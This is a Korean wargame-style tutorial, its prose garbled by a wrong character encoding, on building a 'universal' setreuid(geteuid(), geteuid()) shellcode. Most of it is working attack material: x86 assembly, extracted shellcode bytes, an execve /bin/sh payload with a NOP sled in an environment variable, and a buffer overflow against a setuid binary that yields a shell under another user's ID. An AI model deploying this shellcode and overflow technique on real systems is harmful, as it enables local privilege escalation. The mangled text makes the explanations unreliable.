// ======================================== // // Subject - universal setreuid() shellcode // // ======================================== /* hkpco hkpco@korea.com http://hkpco.kr/ */ ÀϹÝÀûÀ¸·Î ´ëȸ³ª ¿ö°ÔÀÓ µîÀ» ÇÒ ¶§¿¡´Â ¸ñÇ¥ ±ÇÇÑÀÇ uid, gid¿¡ ¸Â´Â setreuid() ±â°è¾î Äڵ带 ¸¸µì´Ï´Ù. ÇÏÁö¸¸ ¸Å¹ø »õ·Î¿î Äڵ带 ¸¸µå´Â°ÍÀº ¸Å¿ì ¹ø°Å·Î¿î ÀÛ¾÷ÀÔ´Ï´Ù. ¿©±â¿¡ ´ëÇØ ¿©·¯°¡Áö »óȲ¿¡¼­ ±»ÀÌ uid¸¦ ½Å°æ¾²Áö ¾Ê°íµµ setreuid() Äڵ带 Àû¿ë½Ãų ¼ö ÀÖ´Â ¹æ¹ýÀ» ¼Ò°³ÇÏ°íÀÚ ÇÕ´Ï´Ù. geteuid() ½Ã½ºÅÛ ÄÝÀ» ÀÌ¿ëÇÏ´Â ¹æ¹ýÀ¸·Î, ÇØ´ç ½Ã½ºÅÛ ÄÝÀº ÇöÀç µ¿ÀÛÇÏ´Â ÇÁ·Î±×·¥ÀÇ uid¸¦ ¸®ÅÏÇØ ÁÝ´Ï´Ù. Áï, setreuid( geteuid() , geteuid() );¸¦ ¼öÇàÇÏ´Â ±â°è¾î Äڵ带 Á¦ÀÛÇϸé geteuid() ½Ã½ºÅÛ ÄÝÀÌ ¸®ÅÏÇØ ÁÖ´Â ´ë»ó ÇÁ·Î±×·¥ÀÇ ±ÇÇÑÀÌ setreuid()¿¡ ¹Ù·Î Àû¿ëµÇ±â ¶§¹®¿¡ »óȲ¿¡ µû¸¥ ´Éµ¿ÀûÀÎ Äڵ尡 µÇ°Ô µË´Ï´Ù. ±×·³ ½ÇÁ¦ ±â°è¾î Äڵ带 Á¦ÀÛÇØ º¸°Ú½À´Ï´Ù. ======================================================================== [hkpco@ns hack]$ cat /usr/include/asm/unistd.h | grep geteuid #define __NR_geteuid 49 [hkpco@ns hack]$ cat /usr/include/asm/unistd.h | grep setreuid #define __NR_setreuid 70 [hkpco@ns hack]$ cat setreuid_univ.s .section .text .globl _start _start: xor %eax, %eax movb $49, %al int $0x80 ## geteuid() system call mov %eax, %ebx mov %eax, %ecx xor %eax, %eax movb $70, %al int $0x80 ## setreuid() system call ======================================================================== À§ ¾î¼Àºí¸® ÄÚµå´Â geteuid() ½Ã½ºÅÛ ÄÝ È£Ãâ ½ÃÀÇ ¸®ÅÏ°ªÀ» setreuid()ÀÇ ÀÎÀÚ·Î ³Ñ°ÜÁÖ°í È£ÃâÇÏ´Â ¿ªÇÒÀ» ÇÕ´Ï´Ù. ÀÌÁ¦ ÄÄÆÄÀÏ ÇÑ µÚ ±â°è¾î Äڵ带 ÃßÃâÇØ º¸°Ú½À´Ï´Ù. ======================================================================== [hkpco@ns hack]$ as setreuid_univ.s -o setreuid_univ.o [hkpco@ns hack]$ ld setreuid_univ.o -o setreuid_univ [hkpco@ns hack]$ objdump -d setreuid_univ setreuid_univ: file format elf32-i386 Disassembly of section .text: 08048074 <_start>: 8048074: 31 c0 xor %eax,%eax 8048076: b0 31 mov $0x31,%al 8048078: cd 80 int $0x80 804807a: 89 c3 mov %eax,%ebx 804807c: 89 c1 mov %eax,%ecx 804807e: 31 c0 xor %eax,%eax 8048080: b0 46 mov $0x46,%al 8048082: cd 80 int $0x80 ======================================================================== ÀÌ·¸°Ô Çؼ­ ¾òÀº ÄÚµå´Â ¾Æ·¡¿Í °°½À´Ï´Ù. -> \x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80 ½ÇÁ¦·Î Á¤»ó ÀÛµ¿ÇÏ´ÂÁö Å×½ºÆ® ÇØ º¸°Ú½À´Ï´Ù. ======================================================================== [hkpco@ns univ]$ id uid=511(hkpco) gid=513(hkpco) groups=513(hkpco) [hkpco@ns univ]$ ls -al total 152 drwxrwxr-x 2 hkpco hkpco 4096 Jan 21 02:20 . drwxrwxrwt 37 root root 131072 Jan 21 02:20 .. -rwsr-sr-x 1 test test 11541 Jan 21 02:19 vuln -rw-r--r-- 1 test test 82 Jan 21 02:19 vuln.c [hkpco@ns univ]$ export HK=`perl -e 'print "\x90"x512, "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80", // setreuid( geteuid() , geteuid() ); "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'` // shellcode [hkpco@ns univ]$ cat get_addr.c int main( void ) { char *p = getenv("HK"); printf( "%p\n" , p ); } [hkpco@ns univ]$ ./get_addr 0xbffffe89 [hkpco@ns univ]$ ./vuln `perl -e 'print "\x89\xfe\xff\xbf"x100'` sh-2.05b$ id uid=524(test) gid=513(hkpco) groups=513(hkpco) ======================================================================== ¼º°øÀûÀ¸·Î ±ÇÇÑÀ» ȹµæÇÑ°ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù.